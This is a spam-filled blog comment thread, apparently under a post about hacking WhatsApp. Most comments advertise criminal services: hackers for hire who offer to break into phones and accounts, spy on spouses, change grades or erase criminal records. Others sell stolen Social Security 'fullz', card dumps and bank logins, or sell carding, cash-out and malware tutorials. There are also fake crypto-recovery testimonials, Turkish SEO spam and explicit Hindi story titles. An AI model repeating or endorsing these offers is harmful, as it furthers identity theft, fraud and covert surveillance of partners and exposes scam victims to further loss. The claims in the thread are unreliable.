- Bitcoin and other crypto retrieval **
- Cell phone hacking
- messages hack
- Get any password from any Email Address.
- Get any password from any Facebook, Twitter or Instagram account.
- Cell phone hacking (whatsapp, viber, line, wechat, etc)
- Credit score upgrade
- Change or upgrade of grade
- Loan and work programs
- Clearing criminal records
- Websites hacking, pentesting.
- IP addresses and people tracking.
- Hacking courses and classes.
Our services are the best on the market and 100% secure and discreet guaranteed.
© NEONHACKER
Website: www.neonhacker.com
Email: hacker@neonhacker.com
PHONE NO(whatsapp): +1805-399-2804
We are a group of hackers called Neon hackers and we offer hacking services for everyone. Some of our services are:
- Bitcoin and other crypto retrieval **
- Cell phone hacking
- messages hack
- Get any password from any Email Address.
- Get any password from any Facebook, Twitter or Instagram account.
- Cell phone hacking (whatsapp, viber, line, wechat, etc)
- Credit score upgrade
- Change or upgrade of grade
- Loan and work programs
- Clearing criminal records
- Websites hacking, pentesting.
- IP addresses and people tracking.
- Hacking courses and classes.
Our services are the best on the market and 100% secure and discreet guaranteed.
© NEONHACKER
Website: www.neonhacker.com
Email: hacker@neonhacker.com
PHONE NO(whatsapp): +1805-399-2804
We are a group of hackers called Neon hackers and we offer hacking services for everyone. Some of our services are:
- Bitcoin and other crypto retrieval **
- Cell phone hacking
- messages hack
- Get any password from any Email Address.
- Get any password from any Facebook, Twitter or Instagram account.
- Cell phone hacking (whatsapp, viber, line, wechat, etc)
- Credit score upgrade
- Change or upgrade of grade
- Loan and work programs
- Clearing criminal records
- Websites hacking, pentesting.
- IP addresses and people tracking.
- Hacking courses and classes.
Our services are the best on the market and 100% secure and discreet guaranteed.
© NEONHACKER
Hello Everyone !
ReplyDeleteUSA SSN Leads/Dead Fullz available, along with Driving License/ID Number with good connectivity.
All SSN's are Tested & Verified.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
*Price for SSN lead $2
*You can ask for sample before any deal
*If you buy in bulk, will give you discount
*Sampling is just for serious buyers
->Hope for the long term business
->You can buy for your specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Hello all
ReplyDeleteam looking few years that some guys comes into the market
they called themselves hacker, carder or spammer they rip the
peoples with different ways and it’s a badly impact to real hacker
now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
Anyone want to make deal with me any type am available but first
I‘ll show the proof that am real then make a deal like
Available Services
..Wire Bank Transfer all over the world
..Western Union Transfer all over the world
..Credit Cards (USA, UK, AUS, CAN, NZ)
..School Grade upgrade / remove Records
..Spamming Tool
..keyloggers / rats
..Social Media recovery
.. Teaching Hacking / spamming / carding (1/2 hours course)
discount for re-seller
Contact: 24/7
fixitrogers@gmail.com
Excellent read, Positive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. private investigation
ReplyDeleteHello W0rld
ReplyDeleteI’m offering Hacking / carding short courses that you can learn in 1 hour to 2 hours.
You don't need to spend a lot of money on so-called fake hackers and fake products,
fake services money transfer, credit score and loans. Hack anything your own via
Android / IOS no need hi-speed computer nor required any IT special skills. Course
are available in Video and text formate also guide privately on localhost with practice.
courses are mentioned :
* Android / IOS hacking
* Cybersecurity landscape
* Network cybersecurity attacks – management and
monitoring
* Malware and advanced persistent threats
* Bank Account Hacking
* Credit card hacking
* Social Media Accounts
* Password stealing
* Carding course online / Offline including VPS / RDP
* Credit Card checker + Balance inquiry
Beside courses I’m sharing with new and upcoming leaks
In hacking world.
Contact info:
DsLeakS@gmail.com
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**PRICE FOR ONE LEAD/FULLZ 2$**
All Leads are Tested & Verified.
Fresh spammed data.
Good credit Scores, 650+ minimum scores.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Minimum buy 25 to 30 leads/fullz
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**PRICE FOR ONE LEAD/FULLZ 2$**
All Leads are Tested & Verified.
Fresh spammed data.
Good credit Scores, 650+ minimum scores.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Minimum buy 25 to 30 leads/fullz
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
This comment has been removed by the author.
ReplyDeletenice http://howtohackwhatsapp.blogspot.com/2013/04/whatsapp-hack.html
ReplyDeleteDalam beberapa tahun terakhir, orang dapat menggunakan situs web yang dapat diandalkan bernama espiarwapp untuk meretas whatsapp tanpa kesulitan apa pun. Ini adalah satu-satunya platform yang membantu Anda memperoleh riwayat whatsapp orang lain dalam beberapa saat. Saat Anda mengunjungi situs https://beltanina.wordpress.com/2020/12/19/echa-un-vistazo-a-la-informacion-como-hackear-whatsapp/ ini, Anda akan menerima lebih banyak detail tentang hackear whatsapp.
ReplyDeleteBest Site to Download Hack App Data Pro
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
Delete如果您认为您的配偶在作弊,并且您需要聘请真正的黑客来远程监控/黑客他们的电话,恢复被盗的比特币/任何其他加密货币或在保证隐私的情况下入侵数据库,请联系easybinarysolutions@gmail.com或whatsapp: +1 3478577580,他们高效而机密。
ReplyDeleteIf you think your spouse is cheating, and you need to hire a real hacker to remotely monitor / hack their phone, recover your stolen bitcoin / any other cryptocurrency, or hack a database with guaranteed privacy, contact easybinarysolutions@gmail.com or whatsapp: +1 3478577580, they are efficient and confidential.
****Contact Me****
ReplyDelete*ICQ :748957107
*Gmail :taimoorh944@gmail.com
*Telegram :@James307
(Selling SSN Fullz/Pros)
*High quality and connectivity
*If you have any trust issue before any deal you may get few to test
*Every leads are well checked and available 24 hours
*Fully cooperate with clients
*Any invalid info found will be replaced
*Credit score above 700 every fullz
*Payment Method
(BTC&Paypal)
*Fullz available according to demand too i.e (format,specific state,specific zip code & specifc name etc..)
*Format of Fullz/leads/profiles
°First & last Name
°SSN
°DOB
°(DRIVING LICENSE NUMBER)
°ADDRESS
(ZIP CODE,STATE,CITY)
°PHONE NUMBER
°EMAIL ADDRESS
°Relative Details
°Employment status
°Previous Address
°Income Details
°Husband/Wife info
°Mortgage Info
$2 for each fullz/lead with DL num
$1 for each SSN+DOB
$5 for each with Premium info
(Price can be negotiable if order in bulk)
OTHER SERVICES ProvIDING
*(Dead Fullz)
*(Email leads with Password)
*(Dumps track 1 & 2 with pin and without pin)
*Hacking Tutorials
*Smtp Linux
*Safe Sock
*Let's come for a long term Business
****Contact Me****
*ICQ :748957107
*Gmail :taimoorh944@gmail.com
*Telegram :@James307
CONTACT 24/7
ReplyDeleteTelegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
Selling SSN+Dob Leads/Fullz with Driving License/ID Number For Tax return & W-2 Form filling, etc.
>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)
Price reduce in Bulk order
DETAILS IN LEADs/FULLZ/PROS
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS
>All Leads are Spammed & Verified.
>Fresh spammed data of USA Credit Bureau
>Good credit Scores, 700 minimum scores
>Invalid info found, will be replaced.
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY
''OTHER GADGETS PROVIDING''
>SSN+DOB Fullz
>CC with CVV
>Photo ID's
>Dead Fullz
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords
Contact 24/7
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Se pensi che il tuo coniuge stia tradendo e devi assumere un vero hacker per monitorare / hackerare da remoto il loro telefono, recuperare il tuo bitcoin rubato / qualsiasi altra criptovaluta o hackerare un database con privacy garantita, contatta easybinarysolutions@gmail.com o whatsapp: +1 3478577580, sono efficienti e riservati.
ReplyDeleteMalaysians who want to get hacking service can contact me on 0103216564. Trusted and surely will deliver results.
ReplyDeleteHacking service provided are as follows:
1. Whatsapp hack (Malaysian Number)
2. Email hack
3. Social media hack
4. Website database hack
5. Phone jacking (IOS and Android)
- call logs
- SMS
- Location tracker
Delivered the job given. A trusted hacker 👍🏼
DeleteTerima kasih..trusted...
DeleteBaru lepas try service hacker ni mmg betul² menjadiii
DeleteService mmg slow tapi apa apa pun kerja menjadi….Okay lah asalkn trusted 👍🏼
Delete**SELLING SSN+DOB FULLZ**
ReplyDeleteCONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)
*Will reduce price if buying in bulk
*Hope for a long term business
FORMAT OF LEADS/FULLZ/PROS
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS
>Fresh Leads for tax returns & w-2 form filling
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY
''OTHER GADGETS PROVIDING''
>SSN+DOB Fullz
>CC with CVV
>Photo ID's
>Dead Fullz
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
THANK YOU
**SELLING SSN+DOB FULLZ**
ReplyDeleteCONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)
*Will reduce price if buying in bulk
*Hope for a long term business
FORMAT OF LEADS/FULLZ/PROS
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS
>Fresh Leads for tax returns & w-2 form filling
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY
''OTHER GADGETS PROVIDING''
>SSN+DOB Fullz
>CC with CVV
>Photo ID's
>Dead Fullz
>Spamming Tutorials
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
THANK YOU
My friend was going through a number of issues and was feeling insecured in terms of his girlfriend. I told him to contact Harish Negi for the solution. And you know what, everything has been sorted out.
ReplyDeleteMobile: +91-8657399601
Website: https://www.remotemobileaccess.com/
If you need to hire a reliable hacker to monitor your spouse’s phone or social network, contact expressfoundations@gmail.com
ReplyDeleteIt’s extremely confidential
ReplyDeleteचाचा के लौड़े से गांड मरवाने में आनंद आ गया गे सेक्स स्टोरी
औरतों का भोसड़ा शादी शुदा लड़कियों की चुदी हुई चूत XXX Photos
दोस्त की माँ को गर्भवती करा चुदाई करके हिंदी सेक्स स्टोरी
सलवार उतार कर गाण्ड मरवाई ट्यूशन वाले सर से हिन्दी सेक्स स्टोरी
सगी माँ को ब्लैकमेल करके चोदा माँ के साथ सेक्स करा हिंदी सेक्स स्टोरी
खंडहर में लेजाकर चुदाई करी स्कूल टीचर की हिंदी सेक्स स्टोरी
सगी विधवा माँ का बलात्कार करा और भोसड़ी चोदी Indian Hindi XXX Sex Stories
नशेडी पापा ने मुझे कॉन्डोम लगा कर माँ की जगह चोदा हिन्दी सेक्स स्टोरी
Really such a beautiful information. For resolving your cell phone related issues you can Hire phone hacker online at affordable price by the professional team of hackers. A hacker might be able to get through the "firewall" your company has in place to protect your system. However, because contractors cannot hire them, they cannot gain access to your company's inner workings.
ReplyDeleteHi Guy's
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>2$ each with SSN+DOB+DL
>>5$ each for premium (also included relative info)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SMTP Linux Root
DUMPS with pins track 1 and 2
Socks, rdp's, vpn's
Server I.P's
HQ Emails with passwords
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
Hi Guy's
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>2$ each with SSN+DOB+DL
>>5$ each for premium (also included relative info)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SMTP Linux Root
DUMPS with pins track 1 and 2
Socks, rdp's, vpn's
Server I.P's
HQ Emails with passwords
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
If you require a professional help to recover your social media accounts or any hack related issues contact this Egyptian Samurai, on What app +1 804 704 6313 for assistance,he's very good..
ReplyDeleteMy life was really messy when i reached out to Reliablehacker06, i was on the verge of losing my house, my car, business was not going well, i was in serious debt. He helped me with a lot of things, raised my credit score, recovered my money lost to fraudulent brokers and did alot of other stuff i would rather not talk about. Just know you can trust him with anything, contact him via WhatsApp +1(234)805-0011 or email Reliablehacker06 @ gmail com
ReplyDeleteHackers yang lain semua scammer jgn percaya. Hacker yg i sendiri pernah cuba and betul2 berjaya hack ni je. I recommend you guys ws dia 0103216564
ReplyDeleteRELIABLE PRIVATE ONLINE INVESTIGATIONS:wizardcyprushacker@gmail.com WhatsApp +1 (424) 209-7204, Have you ever needed an expert when it comes to hacking? Have you ever wanted to hack someone’s email account? Recover lost accounts,school grade,boost credit score? Do you need to find a person’s sensitive information? Do you want to invade a person’s PayPal,Bitcoin hack,and recovery Skills, Amazon, Facebook or any other site account? Upgrade of University Grades,Password and email Retrieval, phone Lines monitoring, Skype Accounts, Hack Social Network, Trace calls on real time conversations, Remove Criminal Records, Credit Fixing, cyber-crime investigation, Hack Bank Accounts, Identification of Cheating Partner or employee,GET HOT STOCK TIPS..
ReplyDeleteThen contact Email:-wizardcyprushacker@gmail.com WhatsApp +1 (424) 209-7204
he won't under any circumstances work for free
Cell phone hacker
ReplyDeleteWe are Verified hackers who provide Cell phone, Social media, Genuine hack and much more. For more information hire best and Verified hackers near me.
Have you ever needed an expert when it comes to hacking? Have you ever wanted to hack someone’s email account? Recover lost accounts,school grade,boost credit score? Do you need to find a person’s sensitive information? Do you want to invade a person’s PayPal,Bitcoin hack,and recovery Skills, Amazon, Facebook or any other site account? Upgrade of University Grades,Password and email Retrieval, phone Lines monitoring, Skype Accounts, Hack Social Network, Trace calls on real time conversations, Remove Criminal Records, Credit Fixing, cyber-crime investigation, Hack Bank Accounts, Identification of Cheating Partner or employee,GET HOT STOCK TIPS..
ReplyDeleteThen contact Email doomhackcyberwizarduk@yahoo.com WhatsApp +1 (289)960-0524
he won't under any circumstances work for you free.
ReplyDeleteHi everyone, I’m a professional hacker from Malaysia.
Some of hacking service provided:
- website database hack
- whatsapp hack
- social media hack (ig,fb,twitter)
- change university grade
Method used:
1. Mysql injection
2. Phishing
3. Key logger
4. DoS/DDoS attack
The best selling hack i would say is whatsapp hack. There is several female clients i helped before to get into their spouse whatsapp messages because they suspect their spouse are cheating.
For inquiry can contact me on firewingshack@gmail.com
MALAYSIAN HACK SERVICE:
ReplyDeleteI PROVIDE HACK SERVICE ON ANY WHATSAPP ACCOUNT, INSTAGRAM ACCOUNT , FACEBOOK ACCOUNT, READ OTHER PHONE SMS, TELEGRAM ACCOUNT, VIBER ACCOUNT, WECHAT ACCOUNT AND ANY SOCIAL MEDIA ACCOUNT. CAN SPY ON YOUR CHEATING PARTNER
WHATSAPP ME: 01154221009
HACKING SERVICE MALAYSIA
ReplyDeletehttp://hackingservicemalaysia.unaux.com/
Malaysian who wants to hack or hire hacker, can visit my website. Thanks!
ReplyDeleteClick Here http://hackingservicemalaysia.unaux.com/
Malaysian who wants to hack or hire hacker, can visit my website. Thanks!
ReplyDeleteClick Here HACKING SERVICE
Hi Guy's
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>2$ each with SSN+DOB+DL
>>5$ each for premium (also included relative info)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
========================
TUTORIALS AVAILABLE FOR
SPAMMING
CARDING
CASHOUTS
MOBILE DEPOSITS
-->SPAMMING price == 200$
>What you need to start spam
-->CARDING price == 300$ (Includes All Carding)
How to use eBay Carding, Amazon Carding, Adidas Carding, BITCOIN CARDING, WALMART CARDING, WESTERN UNION CARDING
WORLD REMIT CARDING METHOD
>APPLE PAY & ANDROID TAP CASH
>BANK TRANSFER
-->DUMPS+PINS price == 85$
(How to use & create dumps with pins track 1 & 2)
>HOW TO CASHOUT DUMPS+PINS
>MOBILE DEPOSIT
>SAFE SOCKS5 (USA)
>SMTP Linux Root price =150$
============================
Also SELLING
>SERVER I.P's & proxies price == 200$ in bulk
>USA EMAILS with Passwords price ==150$ in bulk
>Fresh Leads for tax returns & w-2 form filling
>SSN+DOB Fullz
>CC's with CVV's (vbv & non-vbv)
>USA Photo ID'S (Front & back)
>Payment mode BTC, ETH, LTC, & USDT
Telegram : @Cyberz_Phoenix
Whatsapp : +1 (304) 774-4506
Email : cyberzphoenix1@gmail.com
We have the fresh and valid USA ssn leads
ReplyDelete99% connectivity with quality
====================
*If you have any trust issue you can buy few to test
*Every leads are well checked and available 24 hours
*Fully cooperate with clients
====================
>> SSN+DOB
>> SSN+DOB+DL
>> Premium high score fullz (also included relative info)
====================
TUTORIALS AVAILABLE FOR
SPAMMING
CARDING
CASHOUTS
MOBILE DEPOSITS
>APPLE PAY & ANDROID TAP CASH
>BANK TRANSFER
>HOW TO CASHOUT DUMPS+PINS
>MOBILE DEPOSIT
====================
>SAFE SOCKS5 (USA)
>SMTP Linux Root
-->DUMPS+PINS
(How to use & create dumps with pins track 1 & 2)
=====================
Also SELLING
>SERVER I.P's & proxies in bulk
>USA EMAILS Combo
>Fresh Leads for tax returns & w-2 form filling
>CC's with CVV's (vbv & non-vbv)
>USA Photo ID'S (Front & back)
>Payment mode BTC, ETH, LTC, & USDT
Telegram : @Cyberz_Phoenix
Whatsapp : +1 (304) 774-4506
ReplyDeleteHi. I went over a stunning Chinese hacker. He has assisted with a colossal measure of issues like Phone Hack, Account Hack, Clear Debts, Grade update, Criminal Records help, btc hack E.t.c. He spared my life. you can contact him through his email: roy.wu @ soundmax-hk.com or Whatsapp: +8(618)66466_5106
We have the fresh and valid USA ssn leads
ReplyDelete99% connectivity with quality
====================
*If you have any trust issue you can buy few to test
*Every leads are well checked and available 24 hours
*Fully cooperate with clients
====================
>> SSN+DOB
>> SSN+DOB+DL
>> Premium high score fullz (also included relative info)
====================
TUTORIALS AVAILABLE FOR
SPAMMING
CARDING
CASHOUTS
MOBILE DEPOSITS
>APPLE PAY & ANDROID TAP CASH
>BANK TRANSFER
>HOW TO CASHOUT DUMPS+PINS
>MOBILE DEPOSIT
====================
>SAFE SOCKS5 (USA)
>SMTP Linux Root
-->DUMPS+PINS
(How to use & create dumps with pins track 1 & 2)
=====================
Also SELLING
>SERVER I.P's & proxies in bulk
>USA EMAILS Combo
>Fresh Leads for tax returns & w-2 form filling
>CC's with CVV's (vbv & non-vbv)
>USA Photo ID'S (Front & back)
>Payment mode BTC, ETH, LTC, & USDT
Telegram : @Cyberz_Phoenix
ICQ : @1001829652
WICKR : @cyberzphoenix
If you guys need hacking service can contact me on whatsapp 0103216564. I already helped many customers and i can provide testimony from my previous clients.
ReplyDeleteSome of hacking service provided:
- website database hack
- whatsapp hack
- social media hack (ig,fb,twitter)
- change university grade
Method used:
1. Mysql injection
2. Phishing
3. Key logger
4. DoS/DDoS attack
The best selling hack i would say is whatsapp hack. There is several female clients i helped before to get into their spouse whatsapp messages because they suspect their spouse are cheating.
For inquiry can whatsapp me on 0103216564.
Nation_Hackers is a globally well-established group of international Hackers & Spammers.
ReplyDeleteWe tend to confirm by all suggests that necessary that our shoppers get the most
effective of services on A PAYMENT. Instead of send cash and trust a criminal to meet
your deal. You'll get wonderful client service. That's a 100 percent guarantee.
Be careful of people accused of some crimes, like Ponzis. You have been dragged through
the grimy door to become a sadist or another kind of victim. We are always looking for
a way to communicate directly with you. It would always be a Victory for you here. No
doubt, Nation_Hackers offer matchless services that are unparalleled.
Contact:
Telegram : @Nation_Hackers
ICQ : 1003488698
* USA SSN leads / SSN FULLZ Fresh
* CC With CVV (vbv & non-vbv)
* USA I.D Photos Front & Back
* Other I.D Templates
* High Credit Score Fullz
* Bank Logins
* Paypal Logins
* Netflix Logins
* American Express Login
* UAE Bank Logins
* Disney Plus Logins
* HBO max Logins
* VPN Logins
* Bianance Logins
* Coinbase Logins
* Blockchain Logins
* TOOLS
* TUTORIALS
* Ethical Hacking (Tools/Tutorials)
* Bitcoin Hacking
* Kali Linux
* RATS
* Keylogger
* Bitcoin Flasher
* SQL Injector
* SMTP Linux Root
* Shell Scripting
* SMS Sender
* Email Blaster
* Server I.P's & Proxies
* Viruses
* VPN
* Email Combo
* SQL Injector
* CARDING
* Penetration Testing
* SMTP Mailer
* PHP Mailer
* Trojen V
Contact:
Telegram : @Nation_Hackers
ICQ : 1003488698
We are always looking for a way to communicate directly with you.
It would always be a Victory for you here. No doubt,
with none cheap doubts, it's no news that Nation_Hackers supply one amongst the best services.
Cyberz Lieutenant is a globally well-established group of international Hackers & Spammers.
ReplyDeleteWe tend to confirm by all suggests that necessary that our shoppers get the most
effective of services on A PAYMENT. Instead of send cash and trust a criminal to meet
your deal. You’ll get wonderful client service. That’s a 100 percent guarantee.
BEWARE OF FRAUDSTARS
if you have been a VICTIM,
Contact:
Telegram : @Cyberz_lieutenant
ICQ : @1004202587
WICKR : @@cyberlieutenant
* USA SSN leads / SSN FULLZ Fresh
* CC With CVV (vbv & non-vbv)
* USA I.D Photos Front & Back
* Other I.D Templates
* High Credit Score Fullz
* Bank Logins
* Paypal Logins
* Netflix Logins
* American Express Login
* UAE Bank Logins
* Disney Plus Logins
* HBO max Logins
* VPN Logins
* Bianance Logins
* Coinbase Logins
* Blockchain Logins
* TOOLS
* TUTORIALS
* Ethical Hacking (Tools/Tutorials)
* Bitcoin Hacking
* Kali Linux
* RATS
* Keylogger
* Bitcoin Flasher
* SQL Injector
* SMTP Linux Root
* Shell Scripting
* SMS Sender
* Email Blaster
* Server I.P’s & Proxies
* Viruses
* VPN
* Email Combo
* SQL Injector
* CARDING
* Penetration Testing
* SMTP Mailer
* PHP Mailer
* Trojen V
Contact:
Telegram : @Cyberz_lieutenant
ICQ : @1004202587
WICKR : @cyberlieutenant
We are always looking for a way to communicate directly with you.
I know an organization who have private investigators for hire who can help you get into your spouse’s phones,emails remotely from your phone they can also help you with your
ReplyDelete* credit score
* clearing of criminal record
*increasing of school grades and any thing that has to do with hacking etc
You can confirm for yourself from their email ethicalhackers009@gmail.com so you can also give your testimony
Whatsapp No: +14106350697
Hacker dalam ni banyak tipu je, aku sendiri pernah kena. Nasib aku baik jumpa yg jujur dan lagi murah dari yg kena tipu. Pandai2 la korang cari aku malas nak share kat sini hahaha
ReplyDeletebang tolong bang saya perlukan hacker untuk hack masalah personal saya. nak hack whatsapp dan social media pasangan kalau boleh. betul2 perlukan hacker sekarang, boleh tak bro share mana dapat contact hacker yang boleh dipercayai sebab dah kena scam sebelum ni. harap bro dapat reply komen saya ni
DeleteSearch kat telegram je @hackingservice01 kalau nak hack whatsapp memang aku dah cuba memang berjaya, social media aku tak pasti dia buat atau tak..
DeleteNi link telegram dia https://t.me/hackingservice01
DeleteNi link telegram dia https://t.me/hackingservice01
ReplyDeleteAdana
ReplyDeleteElazığ
Kayseri
Şırnak
Antep
P1Q
izmir
ReplyDeleteErzurum
Diyarbakır
Tekirdağ
Ankara
B05UH
bitlis
ReplyDeleteurfa
mardin
tokat
çorum
4OJD
karabük evden eve nakliyat
ReplyDeletebartın evden eve nakliyat
maraş evden eve nakliyat
mersin evden eve nakliyat
aksaray evden eve nakliyat
XYV
ığdır evden eve nakliyat
ReplyDeletebitlis evden eve nakliyat
batman evden eve nakliyat
rize evden eve nakliyat
niğde evden eve nakliyat
DYEQ
7E99E
ReplyDeleteNevşehir Parça Eşya Taşıma
Yobit Güvenilir mi
Bitfinex Güvenilir mi
Aksaray Lojistik
Ünye Evden Eve Nakliyat
İzmir Evden Eve Nakliyat
Erzincan Şehirler Arası Nakliyat
Mardin Şehir İçi Nakliyat
Ordu Parça Eşya Taşıma
DC3CF
ReplyDeleteKırşehir Evden Eve Nakliyat
Adıyaman Parça Eşya Taşıma
Adıyaman Şehir İçi Nakliyat
Mersin Şehir İçi Nakliyat
Ünye Organizasyon
Nevşehir Parça Eşya Taşıma
Ünye Oto Boya
Edirne Şehirler Arası Nakliyat
Siirt Şehirler Arası Nakliyat
80EBC
ReplyDeleteBalıkesir Evden Eve Nakliyat
Expanse Coin Hangi Borsada
Adıyaman Şehirler Arası Nakliyat
Kütahya Lojistik
Erzurum Evden Eve Nakliyat
Keçiören Parke Ustası
Niğde Şehir İçi Nakliyat
Ünye Koltuk Kaplama
Karabük Parça Eşya Taşıma
E80F7
ReplyDeleteÇerkezköy Çilingir
Şırnak Parça Eşya Taşıma
Şırnak Şehirler Arası Nakliyat
Kastamonu Şehirler Arası Nakliyat
Xcn Coin Hangi Borsada
Manisa Lojistik
Batıkent Boya Ustası
Kırşehir Lojistik
Aksaray Lojistik
460C2
ReplyDeleteMuş Şehir İçi Nakliyat
Adana Evden Eve Nakliyat
Antalya Şehir İçi Nakliyat
Bitexen Güvenilir mi
Çanakkale Lojistik
Çerkezköy Ekspertiz
Amasya Parça Eşya Taşıma
Pancakeswap Güvenilir mi
Mexc Güvenilir mi
I saw an opportunity to invest in cryptocurrency about two months ago and I took my chance. I contacted a broker who I saw videos on youtube and I invested a huge sum of money around $665,211 which was deposited using Bitcoin with hopes to gain massive returns on my investment. I kept tracking my portfolio and it was increasing daily on the website. It made me excited and confident. Fast forward to 30 Days after, which was supposed to be my payout date, I tried to make a withdrawal as I needed money to foot my bills and buy my new house, but the broker insisted that I continue to invest or will have to pay some fees to withdraw my funds. That was very disappointing to hear, because it was all going smoothly when I deposited the funds. Eventually, I paid the fees which was about $45,800. I was desperate now because according to my portfolio, I had made about $1,512,400. Now you see why I was willing to pay the fees. It turned out it was a scheme to keep asking me for more money for one thing or the other, like Taxes, miner fees and so many others. I declined, and instead I won’t pay more. They locked my account for several weeks. A month after, I saw a post on Quora about a Rustik Cyber Hack Service which stated they were capable of getting my money recovered. With a little faith in me, I contacted them immediately, and discussed my situation, and sent all the information I had. In less than a week, I was able to recoup my BTC. I praise the universe for sending them my way. I wish to recommend them to everyone out there. they are capable of recover any crypto coins Bitcoin, Usdt ,Eth, Dogecoin, bank transfer funds now i have my funds back with there guidelines and skills you can always contact them via Email: (rustikcyberhacksservice @ gmail com) or Call/WhatsApp (+ 1) 38. 63. 4 8. 78. 38
ReplyDeleteF9797
ReplyDeletebinance referans kodu
binance referans kodu
referans kimliği nedir
binance referans kodu
resimli magnet
resimli magnet
referans kimliği nedir
resimli magnet
binance referans kodu
A19F7
ReplyDeletereferans kimliği nedir
resimli magnet
binance referans kodu
resimli magnet
referans kimliği nedir
binance referans kodu
resimli magnet
binance referans kodu
binance referans kodu
This comment has been removed by the author.
ReplyDeleteWhatsApp Internet Pro is a web-based WhatsApp version that lets individuals access the messaging platform via a web browser. This function permits individuals to gain access to WhatsApp from their computer without needing to download a separate application or make use of an emulator.
DeleteVidMate is a super application to download videos and music from various social media accounts. The application supports many websites and allows its users to download videos from different platforms, including YouTube, Instagram, Twitter, WhatsApp, TikTok, etc. vidmate old version whatsapp status download It also helps the users to download WhatsApp status. It provides the option to set the quality of videos and images from 144p to 4K HD resolution, which is the coolest feature of all the rest of the features.
ReplyDeleteI would like to personally congratulate you as your blog
ReplyDelete47052
ReplyDeletegüvenilir kripto para siteleri
referans kodu
probit
